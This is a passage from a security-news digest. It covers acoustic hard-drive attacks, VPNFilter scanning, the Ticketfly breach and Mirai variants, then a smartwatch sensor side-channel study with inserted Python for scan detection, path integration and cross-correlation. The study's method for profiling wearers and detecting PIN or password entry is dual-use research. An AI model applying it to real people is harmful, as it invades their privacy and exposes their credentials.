Modern HDDs use shock sensors to prevent head crashes, but the researchers demonstrated that sonic and ultrasonic sounds can trigger false positives in the shock sensor, causing the drive to park the head in the wrong position.

“We created and modeled a new feedback controller that could be deployed as a firmware update to attenuate the intentional acoustic interference. Our sensor fusion method prevents unnecessary head parking by detecting ultrasonic triggering of the shock sensor” reads the paper published by the experts.


The experts demonstrated the technique in real-world attacks targeting HDDs in desktop computers and CCTV (Closed-Circuit Television) systems.

The attackers only need to trick victims into playing a malicious sound, for example one attached to an email or triggered by visiting a specially crafted web page.

“Our case studies show that an attacker can use the effects from hard disk drive vulnerabilities to launch system level consequences such as crashing Windows on a laptop using the built-in speaker and preventing surveillance systems from recording video. We delve into the details of the Windows and Linux operating systems to uncover the root causes of the crash in the I/O request stack” the experts continue.

The experts tested the technique against HDDs from several vendors, including Seagate, Toshiba, and Western Digital. Notably, the ultrasonic waves took just 5-8 seconds to cause severe interference.


Sound interferences with a duration greater than 105 seconds caused the Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.

“Recordings from periods of interference less than 105 seconds exhibited video loss from about 12 seconds after being subjected to acoustic induced vibration until the vibration subsided. In contrast, (2) interference for periods of 105 seconds or longer resulted in video loss from the beginning of the vibration until the device was restarted.” continues the paper.

“In the case that a victim user is not physically near the system being attacked, an adversary can use any frequency to attack the system. The system’s live camera stream never displays an indication of an attack. Also, the system does not provide any method to learn of audio in the environment. Thus, if a victim user were not physically near the system, an adversary can use audible signals while remaining undetected.”

The tests demonstrated that an attacker can disrupt HDDs in desktops and laptops running both Windows and Linux operating systems.

The experts were able to make a Dell XPS 15 9550 laptop freeze after 45 seconds, and crash after 125 seconds, when it was tricked into playing malicious audio over its built-in speaker.

The paper also includes recommendations to detect or prevent such type of attacks, including a new feedback controller to attenuate the acoustic interference that could be deployed as a firmware update.

Another countermeasure against attacks leveraging sonic and ultrasonic signals could be a sensor fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor.

The last countermeasure is the use of noise-dampening materials to attenuate the signal.

Experts believe the botmaster of the VPNFilter is attempting to resume the botnet

2.6.2018 securityaffairs BotNet

Experts from security firms GreyNoise Intelligence and JASK believe that the threat actor behind VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago, security experts and law enforcement agencies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine; fortunately, prompt action by the authorities allowed it to be taken down.


Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine, and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity, with most infections in Ukraine; the majority of the compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, monitoring of the malicious traffic associated with VPNFilter shows that the botmasters are attempting to resume the botnet.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts show threat actors targeting MikroTik routers on Ukrainian networks with port 2000 exposed online.
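As an added example of the kind of check behind the "exclusively scanning for port 2000" finding above (illustrative code written for this page, not JASK's or GreyNoise's tooling), the block below groups SYN attempts in a firewall log by source address and flags sources whose every attempt targets that one port and that touched several distinct hosts. The log format and the addresses (RFC 5737 documentation ranges) are constructed for the example.

```python
# Added example: flag sources that scan exclusively for one TCP port across many
# hosts, the pattern the JASK/GreyNoise report describes for port 2000 (MikroTik).
# The log lines and addresses below are constructed, not real telemetry.
import re
from collections import defaultdict

SAMPLE_LOG = """\
2018-06-01T10:00:01Z SYN src=203.0.113.7 dst=192.0.2.10 dport=2000
2018-06-01T10:00:01Z SYN src=203.0.113.7 dst=192.0.2.11 dport=2000
2018-06-01T10:00:02Z SYN src=203.0.113.7 dst=192.0.2.12 dport=2000
2018-06-01T10:00:02Z SYN src=203.0.113.7 dst=192.0.2.13 dport=2000
2018-06-01T10:00:03Z SYN src=203.0.113.7 dst=192.0.2.14 dport=2000
2018-06-01T10:00:03Z SYN src=198.51.100.4 dst=192.0.2.10 dport=443
2018-06-01T10:00:04Z SYN src=198.51.100.4 dst=192.0.2.10 dport=2000
2018-06-01T10:00:04Z SYN src=198.51.100.4 dst=192.0.2.11 dport=80
2018-06-01T10:00:05Z SYN src=203.0.113.9 dst=192.0.2.20 dport=2000
2018-06-01T10:00:05Z SYN src=203.0.113.9 dst=192.0.2.21 dport=2000
this line is malformed and must be skipped
"""

# Field layout is an assumption of this example; adapt the pattern to your firewall's format.
LINE_RE = re.compile(r"src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)")


def parse_log(text):
    """Yield (src, dst, dport) tuples from SYN log lines; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m["src"], m["dst"], int(m["dport"])


def find_single_port_scanners(text, port, min_targets=3):
    """Sources whose every attempt went to `port` and that touched >= min_targets distinct hosts.

    A source that also probes other ports (198.51.100.4 above) is not flagged: the
    report's signal is exclusivity, which separates a targeted sweep from generic
    background scanning. min_targets keeps a single legitimate connection out.
    """
    ports_by_src = defaultdict(set)
    targets_by_src = defaultdict(set)
    for src, dst, dport in parse_log(text):
        ports_by_src[src].add(dport)
        targets_by_src[src].add(dst)
    return sorted(
        src for src in ports_by_src
        if ports_by_src[src] == {port} and len(targets_by_src[src]) >= min_targets
    )


if __name__ == "__main__":
    print("port-2000-only scanners:", find_single_port_scanners(SAMPLE_LOG, 2000))
```

In practice the threshold would be tuned per network and the flagged sources correlated with the Ukrainian-netblock scope the report mentions; the point of the exclusivity test is that a router-specific sweep looks different from the broad port sweeps that make up most Internet background noise.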

The VPNFilter malware is very sophisticated and implements many functionalities typical of nation-state malware, such as wiping firmware, communicating via Tor, monitoring traffic, and targeting ICS devices.

US authorities blamed the Russia-linked APT28 hacking group for the creation of the botnet; Ukrainian organizations must remain vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.

Visa payments DOWN: Millions affected by a service disruption
2.6.2018 securityweek Hacking

The Visa card payment system suffered a widespread outage across Europe; millions of users were unable to make payments with their cards.
Shoppers and travelers across Europe have been unable to make card payments since around 2.30pm on Friday.

At the time of writing, Visa confirmed the widespread problems but did not provide any details on the cause.


Visa and major banks also informed their customers through social media, while major retailers confirmed that customers were unable to pay with their cards.

The problems suffered by Visa are also affecting MasterCard and Amex, because the two services were rerouting some transactions via Visa’s IT network.

Visa UK

We are currently experiencing a service disruption which is preventing some Visa transactions in Europe from being processed. We are investigating the cause and working as quickly as possible to resolve the situation. We will keep you updated.

6:49 PM - Jun 1, 2018

Bank of Ireland

We are aware some customers are experiencing Visa debit card issues. This is impacting multiple banks across Europe. We will update when we know more. Cash withdrawals can be made at any BOI ATM.

5:19 PM - Jun 1, 2018
“We are unable to accept Visa card payments currently. No retailers are able to accept Visa cards.” said Marks & Spencer.

Ticketfly website was compromised, the hacker also stole customers’ data
2.6.2018 securityweek Hacking

The website of the events ticketing company Ticketfly was shut down after a hacker who calls himself “IsHaKdZ” compromised it.
The hacker defaced the Ticketfly website with a picture of Guy Fawkes and a warning that read “Your Security Down im Not Sorry.” The attacker also published a yandex.com email account along with the following message:

“Ticketfly HacKeD By IsHaKdZ. Your Security Down im Not Sorry. Next time I will publish database ‘backstage’ (sic).”

The hacker also warned administrators that he has access to a database titled “backstage,” and shared links to files containing customer and client information, including names, physical addresses, phone numbers and email addresses.


Ticketfly, which is owned by Eventbrite, has taken down the site in response to the incident and posted a data breach notification.

“We are currently investigating a cybersecurity incident targeting Ticketfly.com that has resulted in the compromise of some client and customer information. After learning of the incident, we immediately launched an investigation, and out of an abundance of caution, we took the site down while we work to address the issue.” reads the data breach notification published by the company.

“Out of an abundance of caution, we have taken all Ticketfly systems temporarily offline as we continue to look into the issue. We are working to bring our systems back online as soon as possible,”

Troy Hunt

Seeing a lot of tweets about a breach at @ticketfly right now: https://twitter.com/search?q=ticketfly&src=typd …

6:38 AM - May 31, 2018
Everyone who has purchased tickets via the Ticketfly platform will have to print them out and bring a photo ID to the venue hosting the event; Ticketfly provides printed guest lists to the venues.

People who have tickets purchased by other people may need to show the original payment card used to buy the ticket, a copy of the original buyer’s ID, and an authorization note from the original buyer.

Motherboard has spoken with the hacker, who confirmed that he initially attempted to contact the company to report a vulnerability in the website, without success. He asked for a payment of 1 bitcoin to disclose the issue but, receiving no reply, decided to exploit the flaw.

Motherboard confirmed the authenticity of at least some of the records stored in the files leaked by the hacker.

“In an email conversation with Motherboard, the hacker claimed to have warned Ticketfly of a vulnerability that allowed him to take control of “all database” for Ticketfly and its website.” wrote Lorenzo Bicchierai on Motherboard. “The hacker said they asked for 1 bitcoin to share the details of the vulnerability but did not get a reply. The hacker shared what appears to be two emails between him and a series of Ticketfly employees in which the hacker mentions the vulnerability.”

The company confirmed that it is still investigating the issue in order to determine the extent of the security breach.

“Our investigation into the incident is ongoing. We’re putting all of our resources to confirm the extent of the unauthorized access. We’re committed to communicating with all customers once we have more information about the scope of the issue,” Ticketfly told customers in the notification.

Crooks expand the original Mirai botnet code base with new capabilities and improvements
2.6.2018 securityweek  CyberCrime

Cybercriminals continue to improve the infamous Mirai botnet by adding new exploits and functionalities; experts warn that new dangerous variants will appear in the wild.
According to Netscout’s Arbor Security Engineering and Response Team (ASERT), cybercriminals continue to improve the dreaded Mirai IoT botnet by adding new exploits and functionalities.

The time to market of new Mirai botnet versions is shrinking drastically: in a few months, experts spotted at least four Mirai variants in the wild, namely Satori, JenX, OMG and Wicked.

Vxers are using the leaked Mirai source code to create their own versions, a trend that is worrying security experts.

“Using Mirai as a framework, botnet authors can quickly add in new exploits and functionally, thus dramatically decreasing the development time for botnets. The Mirai source is not limited to only DDoS attacks. A variant of Satori was discovered which attacks Ethereum mining clients.” states the report published by Netscout.


Below are the key findings for the new Mirai variants:

Satori uses a remote code injection exploit to implement its scanning feature.
JenX evolved from Mirai and shares much of its code, but the authors removed the scanning and exploitation capabilities.
The OMG bot adds HTTP and SOCKS proxy capabilities.
Wicked exploits RCE flaws to infect Netgear routers and CCTV-DVR devices. When vulnerable devices are found, a copy of the Owari bot is downloaded and executed.

Cybercriminals will continue to use Mirai variants to build large botnets; for this reason, experts recommend that organizations apply proper patching, updates, and DDoS mitigation strategies to protect their infrastructure.

“As seen with the four samples covered above, botnet authors are already using the Mirai source code as their building blocks. As the explosion of IoT devices does not look to be slowing down, we believe we’ll continue to see increases in IoT botnets.” concluded the report.

“We are likely to see remnants of Mirai live on in these new botnets as well.”

Trojan watch

1.6.2018 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how the proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned our attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.

From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.

In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although analysis of the signals from the embedded sensors we investigated cannot (yet) emulate “traditional” keyloggers, it can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity for cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.

So, first things first.

Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.

For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).

Logging smartwatch signals during password entry

To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory: obtaining more or less satisfactory cross-correlation values required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not seem that much, but it adds up over hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.

Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.

But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s², and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.

Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals

The graph contains five areas in which different patterns are clearly visible. For those versed in kinematics, it tells a lot about the user.

The most obvious motion pattern is walking. We’ll start with that.

When the user is walking, the hand wearing the smartwatch oscillates like a pendulum. Pendulum swings are a periodic process. Therefore, if there are areas on the graph where the acceleration or orientation readings from the motion sensor vary according to the law of periodicity, it can be assumed that the user was walking at that moment. When analyzing the data, it is worth considering the accelerometer and gyroscope readings as a whole.

Let’s take a closer look at the areas with the greatest oscillations over short time intervals (the purple areas Pattern1, Pattern3, and Pattern5).

Accelerometer and gyroscope readings during walking

In our case, periodic oscillations of the hand were observed for a duration of 12 minutes (Pattern1, figure above). Without requesting geoinformation, it’s difficult to say exactly where the user was going, although a double numerical integration of the acceleration data shows, up to the integration constants (initial velocity and coordinates), that the person was walking somewhere, and with varying characteristic velocity.

Result of the numerical integration of the accelerometer data, which gives an estimate of the user’s movement along the x and y axes in the space of one hour (z-axis displacement is zero, so the graph does not show it)

Note that plotting the Y-axis displacement relative to the X-axis displacement gives the person’s approximate path. The distances here are not overly precise, but they are in the order of thousands of meters, which is actually quite impressive, because the method is very primitive. To refine the distance traveled, anthropometric data can be used to estimate the length of each step (which is basically what fitness trackers do), but we shall not include this in our study.

Approximate path of the person under observation, determined on the basis of numerically integrating the accelerometer data along the X and Y axes
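As an added illustration of the double numerical integration described above (example code written for this page, not the researchers' own app), the block below integrates x and y acceleration samples twice with the trapezoidal rule and returns the estimated path. The acceleration profile is constructed, not sensor data, and the assumption of zero initial velocity and position stands in for the integration constants the text mentions. The bias function shows why the distances are rough: a constant sensor offset integrates into a displacement error that grows with the square of the elapsed time.

```python
# Added example: double numerical integration of accelerometer samples into an
# approximate path. The acceleration profile below is constructed for the example,
# not data from a real smartwatch.
import math

RATE_HZ = 100                 # the study sampled its sensors at 100 Hz
DT = 1.0 / RATE_HZ            # 10 ms between samples


def cumulative_trapezoid(samples, dt=DT):
    """Running integral of a uniformly sampled signal (trapezoidal rule).

    The first value is 0, i.e. the integration constant is taken as zero:
    for acceleration that means zero initial velocity, for velocity zero
    initial position. This is exactly the ambiguity the text mentions.
    """
    out = [0.0]
    for prev, cur in zip(samples, samples[1:]):
        out.append(out[-1] + dt * (prev + cur) / 2.0)
    return out


def path_from_acceleration(ax, ay, dt=DT):
    """Integrate x/y acceleration twice; returns (list of (x, y) points, (vx, vy))."""
    vx, vy = cumulative_trapezoid(ax, dt), cumulative_trapezoid(ay, dt)
    sx, sy = cumulative_trapezoid(vx, dt), cumulative_trapezoid(vy, dt)
    return list(zip(sx, sy)), (vx, vy)


def path_length(points):
    """Length of the polyline through the estimated points (metres)."""
    return sum(math.hypot(x2 - x1, y2 - y1)
               for (x1, y1), (x2, y2) in zip(points, points[1:]))


def constructed_profile(seconds=10, rate_hz=RATE_HZ):
    """Constructed motion: 2 s at +1 m/s^2, 6 s coasting, 2 s at -1 m/s^2 along x,
    nothing along y. Exact answer: peak speed 2 m/s, 16 m travelled, back at rest."""
    n = seconds * rate_hz
    ax = [1.0 if i < 2 * rate_hz else (0.0 if i < 8 * rate_hz else -1.0) for i in range(n)]
    ay = [0.0] * n
    return ax, ay


def bias_drift(bias, seconds, rate_hz=RATE_HZ):
    """Spurious displacement produced by a constant accelerometer bias alone.

    Integrating a constant twice gives 0.5 * bias * t^2, so even a few cm/s^2
    of offset dominates an hour-long log; this is why the text calls the
    distances rough and why trackers estimate step length instead.
    """
    n = seconds * rate_hz
    pts, _ = path_from_acceleration([bias] * n, [0.0] * n, 1.0 / rate_hz)
    return pts[-1][0]


if __name__ == "__main__":
    ax, ay = constructed_profile()
    pts, (vx, vy) = path_from_acceleration(ax, ay)
    print("end point:", pts[-1], "peak speed:", max(vx), "path length:", path_length(pts))
    print("drift from 0.05 m/s^2 bias over 10 s:", bias_drift(0.05, 10))
    print("drift from 0.05 m/s^2 bias over 1 h:", bias_drift(0.05, 3600))
```

The trapezoidal rule recovers the 16 m of the constructed motion to within a few centimetres, but the same routine turns a 0.05 m/s² bias into hundreds of kilometres over an hour, which is the practical reason the text calls the method primitive and suggests anthropometric step-length estimation instead.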

It is more difficult to analyze the less active areas. Clearly, the person was at rest during these periods. The orientation of the watch does not change, yet there is acceleration, which suggests that the person is moving by car (or elevator).

Another 22-minute segment is shown below. This is clearly not walking — there are no observable periodic oscillations of the signal. However, we see a periodic change in the acceleration signal envelope along one axis. It might be a means of public transport that moves in a straight line, but with stops. What is it? Some sort of public transportation?

Accelerometer data when traveling on public transport

Here’s another time slice.

Pattern 3, accelerometer data

This seems to be a mixture of short periods of walking (for a few seconds), pauses, and abrupt hand movements. The person is presumably indoors.

Below we interpret all the areas on the graph.

Accelerometer and gyroscope readings with decoding of areas

These are three periods of walking (12, 3, and 5 minutes) interspersed with subway journeys (20 and 24 minutes). The short walking interval has some particular characteristics, since it involved changing from one subway line to another. These features are clearly visible, but our interest was in determining them using algorithms that can be executed on the wearable devices themselves. Therefore, instead of neural networks (which we know to be great at this kind of task), we used a simple cross-correlation calculation.

Taking two walking patterns (Walking1 and Walking2), we calculated their cross-correlation with each other and the cross-correlation with noise data using 10-second signal data arrays.

Experiment            | max (cor) Ax | max (cor) Ay | max (cor) Az | max (cor) Wx | max (cor) Wy | max (cor) Wz
Walking1 and Walking2 | 0.73         | 0.70         | 0.64         | 0.62         | 0.41         | 0.83
Walking1 and Noise    | 0.33         | 0.30         | 0.32         | 0.30         | 0.33         | 0.33
Maxima of the functions for cross-correlation of walking patterns with each other and with an arbitrary noise pattern

It can be seen from the table that even this elementary approach of calculating cross-correlation functions allows us to identify the user’s movement patterns within his/her “digital snapshot” with an accuracy of up to 83% (given a very rough interpretation of the correlation). This indicator may not seem that high, but it should be stressed that we did not optimize the sample size and did not use more complex algorithms, for example, principal component analysis, which is assumed to work quite well in determining the characteristic parts of the signal log.
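As an added example of the cross-correlation calculation the table above reports (illustrative code written for this page, not the study's own app), the block below computes, for each of the six axes, the maximum of the normalised cross-correlation over a range of lags between two 10-second, 100 Hz windows. The walking and noise windows are constructed (a pendulum-like sinusoid per axis plus Gaussian sensor noise, and pure noise), so the maxima come out higher than the study's real-data values, but the statistic is the same one the PIN-entry and password tables further down report.

```python
# Added example: maximum normalised cross-correlation between 10-second sensor
# windows, the statistic the tables in this article report. Windows here are
# constructed (sinusoid + noise, and pure noise), not recorded smartwatch data.
import math
import random

AXES = ("Ax", "Ay", "Az", "Wx", "Wy", "Wz")   # accelerometer and gyroscope axes
RATE_HZ = 100                                  # sampling rate used in the study
WINDOW = 10 * RATE_HZ                          # 10-second signal arrays


def zscore(x):
    """Centre and scale a sequence to zero mean and unit (population) std-dev."""
    n = len(x)
    mean = sum(x) / n
    sd = math.sqrt(sum((v - mean) ** 2 for v in x) / n) or 1.0
    return [(v - mean) / sd for v in x]


def max_xcorr(x, y, max_lag):
    """(maximum, lag) of the normalised cross-correlation over lags in [-max_lag, max_lag].

    Each lag's value is the mean product of the overlapping z-scored samples, so
    identical signals give 1.0 and unrelated signals hover near 0.
    """
    zx, zy = zscore(x), zscore(y)
    n = min(len(zx), len(zy))
    best, best_lag = -1.0, 0
    for lag in range(-max_lag, max_lag + 1):
        if lag >= 0:
            a, b = zx[lag:n], zy[:n - lag]
        else:
            a, b = zx[:n + lag], zy[-lag:n]
        r = sum(p * q for p, q in zip(a, b)) / len(a)
        if r > best:
            best, best_lag = r, lag
    return best, best_lag


def compare_windows(win_a, win_b, max_lag=RATE_HZ):
    """Per-axis maxima (lag search of +/- 1 s), rounded like the article's tables."""
    return {axis: round(max_xcorr(win_a[axis], win_b[axis], max_lag)[0], 2) for axis in AXES}


def walking_window(rng, cadence_hz=1.8, phase=0.0):
    """Constructed pendulum-like walking signal: one sinusoid per axis (different
    amplitude and phase offset per axis) plus Gaussian sensor noise."""
    amps = {"Ax": 3.0, "Ay": 2.0, "Az": 1.5, "Wx": 2.5, "Wy": 1.8, "Wz": 2.2}
    win = {}
    for k, axis in enumerate(AXES):
        win[axis] = [amps[axis] * math.sin(2 * math.pi * cadence_hz * i / RATE_HZ + phase + 0.7 * k)
                     + rng.gauss(0.0, 0.3) for i in range(WINDOW)]
    return win


def noise_window(rng):
    """Constructed 'noise' pattern: no periodic structure at all."""
    return {axis: [rng.gauss(0.0, 1.0) for _ in range(WINDOW)] for axis in AXES}


def run_experiment(seed=7):
    """Reproduce the shape of the article's first table on constructed data."""
    rng = random.Random(seed)
    walking1 = walking_window(rng, phase=0.0)
    walking2 = walking_window(rng, phase=1.1)       # same gait, different start phase
    noise = noise_window(rng)
    return {
        "Walking1 and Walking2": compare_windows(walking1, walking2),
        "Walking1 and Noise": compare_windows(walking1, noise),
    }


if __name__ == "__main__":
    for name, row in run_experiment().items():
        print(name, row)
```

The lag search matters: two walks that start at different points of the stride only line up at some non-zero shift, which is why the maximum over lags, not the value at lag zero, is the quantity to threshold. Pure Python is used so the block runs without NumPy; the O(lags × samples) loop is what a watch-side implementation would also have to afford, which is the constraint the text gives for preferring this over a neural network.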

What does this provide to the potential attackers? Having identified the user’s movements in the subway, and knowing the characteristic directions of such movement, we can determine which subway line the user is traveling on. Sure, it would be much easier having data about the orientation of the X and Y axes in space, which could be obtained using a magnetometer. Unfortunately, however, the strong electromagnetic pickup from the electric motors, the low accuracy of determining a northerly direction, and the relatively few magnetometers in smartwatches forced us to abandon this idea.

Without data on the orientation of the X and Y axes in space (most likely different for individual periods), the problem of decoding the motion trajectory becomes a geometric task of overlaying time slices of known length onto the terrain map. Again, placing ourselves in the attacker’s shoes, we would look for the magnetic field bursts that indicate the acceleration/deceleration of an electric train (or tram or trolleybus), which can provide additional information allowing us to work out the number of interim points in the time slices of interest to us. But this too is outside the scope of our study.

Cyberphysical interception of critical data
But what does this all reveal about the user’s behavior? More than a bit, it turns out. It is possible to determine when the user arrives at work, signs into a company computer, unlocks his or her phone, etc. Comparing data on the subject’s movement with the coordinates, we can pinpoint the moments when they visited a bank and entered a PIN code at an ATM.

PIN codes
How easy is it to capture a PIN code from accelerometer and gyroscope signals from a smartwatch worn on the wrist? We asked four volunteers to enter personal PINs at a real ATM.

Accelerometer signals when entering a PIN code on an ATM keypad

Jumping slightly ahead, it’s not so simple to intercept an unencrypted PIN code from sensor readings by elementary means. However, this section of the “accelerometer log” gives away certain information — for example, the first half of the graph shows that the hand is in a horizontal position, while the oscillating values in the second half indicate keys being pressed on the ATM keypad. With neural networks, signals from the three axes of the accelerometer and gyroscope can be used to decipher the PIN code of a random person with a minimum accuracy of 80% (according to colleagues from Stevens Institute of Technology). The disadvantage of such an attack is that the computing power of smartwatches is not yet sufficient to implement a neural network; however, it is quite feasible to identify this pattern using a simple cross-correlation calculation and then transfer the data to a more powerful machine for decoding. Which is what we did, in fact.

Experiment                     | max (cor) Ax | max (cor) Ay | max (cor) Az | max (cor) Wx | max (cor) Wy | max (cor) Wz
One person and different tries | 0.79         | 0.87         | 0.73         | 0.82         | 0.51         | 0.81
Maxima of the functions for cross-correlation of PIN entry data at an ATM

Roughly interpreting these results, it is possible to claim 87% accuracy in recovering the PIN entry pattern from the general flow of signal traffic. Not bad.

Passwords and unlock codes
Besides trips to the ATM, we were interested in two more scenarios in which a smartwatch can undermine user security: entering computer passwords and unlocking smartphones. We already knew the answer (for computers and phones) using a neural network, of course, but we still wanted to explore first-hand, so to speak, the risks of wearing a smartwatch.

Sure, capturing a password entered manually on a computer requires the person to wear a smartwatch on both wrists, which is an unlikely scenario. And although, theoretically, dictionaries could be used to recover semantically meaningful text from one-handed signals, it won’t help if the password is sufficiently strong. But, again, the main danger here is less about the actual recovery of the password from sensor signals than the ease of detecting when it is being entered. Let’s consider these scenarios in detail.

We asked four people to enter the same 13-character password on a computer 20 times. Similarly, we conducted an experiment in which two participants unlocked an LG Nexus 5X smartphone four times each with a 4-digit key. We also logged the movements of each participant when emulating “normal” behavior, especially in chat rooms. At the end of the experiment, we synchronized the time of the readings, cutting out superfluous signals.

In total, 480 discrete functions were obtained for all sensor axes. Each of them contains 250-350 readings, depending on the time taken to enter the password or arbitrary data (approximately three seconds).

Signal along the accelerometer and gyroscope axes for four attempts by one person to enter one password on a desktop computer

To the naked eye, the resulting graphs are almost identical; the extremes coincide, partly because the password and mode of entry were identical in all attempts. This means that the digital fingerprints produced by one and the same person are very similar to each other.

Signals along the accelerometer and gyroscope axes for attempts to enter the same password by different people on a desktop computer

When overlaying the signals received from different people, it can be seen that, although the passphrase is the same, it is entered differently, and even visually the extremes do not coincide!

Attempts to enter a smartphone unlock code by two different people

It is a similar story with mobile phones. Moreover, the accelerometer captures the moments when the screen is tapped with the thumb, from which the key length can be readily determined.

But the eye can be deceived. Statistics, on the other hand, are harder to hoodwink. We started with the simplest and most obvious method of calculating the cross-correlation functions for the password entry attempts by one person and for those by different people.

The table shows the maxima of the functions for cross-correlation of data for the corresponding axes of the accelerometer and gyroscope.

| Experiment | max (cor) Ax | max (cor) Ay | max (cor) Az | max (cor) Wx | max (cor) Wy | max (cor) Wz |
|---|---|---|---|---|---|---|
| One person | 0.92 | 0.63 | 0.71 | 0.55 | 0.76 | 0.96 |
| Different persons | 0.65 | 0.35 | 0.31 | 0.23 | 0.37 | 0.76 |

Maxima of the functions for cross-correlation of password input data entered by different people on a desktop computer

Broadly speaking, it follows that even a very simple cross-correlation calculation can identify a person with up to 96% accuracy! If we compare the maxima of the cross-correlation function for signals from different people in arbitrary text input mode, the correlation maximum does not exceed 44%.

| Experiment | max (cor) Ax | max (cor) Ay | max (cor) Az | max (cor) Wx | max (cor) Wy | max (cor) Wz |
|---|---|---|---|---|---|---|
| One person and different activity | 0.32 | 0.27 | 0.39 | 0.26 | 0.30 | 0.44 |

Maxima of the functions for cross-correlation of data for different activities (password entry vs. usual surfing)

| Experiment | max (cor) Ax | max (cor) Ay | max (cor) Az | max (cor) Wx | max (cor) Wy | max (cor) Wz |
|---|---|---|---|---|---|---|
| One person | 0.64 | 0.47 | 0.56 | 0.41 | 0.30 | 0.58 |
| Different persons | 0.33 | 0.40 | 0.40 | 0.32 | 0.38 | 0.34 |

Maxima of the functions for cross-correlation of data for an unlock code entered by one person and by different people

Note that the smallest cross-correlation function values were obtained for entering the smartphone unlock code (up to 64%), and the largest (up to 96%) for entering the computer password. This is to be expected, since the hand movements and corresponding acceleration (linear and angular) are minimal in the case of unlocking.

However, we note once more that the computing power available to a smartwatch is sufficient to calculate the correlation function, which means that a smart wearable gadget can perform this task by itself!
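As an added illustration (not the study's own code), the per-axis statistic reported in the tables above, the maximum of the normalized cross-correlation function between two traces, computed in pure Python over constructed synthetic traces that stand in for the six accelerometer and gyroscope axes; the signal model, the two synthetic "persons" and the seed are assumptions.

```python
"""Maximum of the cross-correlation function per sensor axis.

Added example, not the study's code. It reproduces the statistic in the
tables above (max of the normalized cross-correlation between two traces,
one value per accelerometer/gyroscope axis) on constructed synthetic traces.
"""
import math
import random

AXES = ["Ax", "Ay", "Az", "Wx", "Wy", "Wz"]  # 3 accelerometer + 3 gyroscope axes


def normalize(x):
    """Return a zero-mean, unit-variance copy of the sequence."""
    n = len(x)
    mean = sum(x) / n
    var = sum((v - mean) ** 2 for v in x) / n
    sd = math.sqrt(var) if var > 0 else 1.0
    return [(v - mean) / sd for v in x]


def max_cross_correlation(a, b, max_lag=None):
    """Maximum over lags of the normalized cross-correlation of traces a and b.

    Both traces are normalized first, so a time-shifted copy scores close to
    1.0 and unrelated traces score near 0. Lags whose overlap is shorter than
    half a trace are skipped to avoid spurious edge maxima.
    """
    a, b = normalize(a), normalize(b)
    n = min(len(a), len(b))
    if max_lag is None:
        max_lag = n // 2
    best = -1.0
    for lag in range(-max_lag, max_lag + 1):
        pairs = list(zip(a[lag:], b)) if lag >= 0 else list(zip(a, b[-lag:]))
        if len(pairs) < n // 2:
            continue
        # biased estimator: divide by the full length, not by the overlap
        best = max(best, sum(x * y for x, y in pairs) / n)
    return best


def make_trace(rng, components, n=300, noise=0.1, shift=0):
    """Constructed stand-in for a ~3 s trace (250-350 samples in the study):
    a sum of sinusoids with per-person (frequency, phase) pairs plus noise."""
    return [
        sum(math.sin(2 * math.pi * f * (i - shift) / n + p) for f, p in components)
        + rng.gauss(0, noise)
        for i in range(n)
    ]


def axis_maxima(traces_a, traces_b):
    """One table row: max cross-correlation per axis, rounded like the study."""
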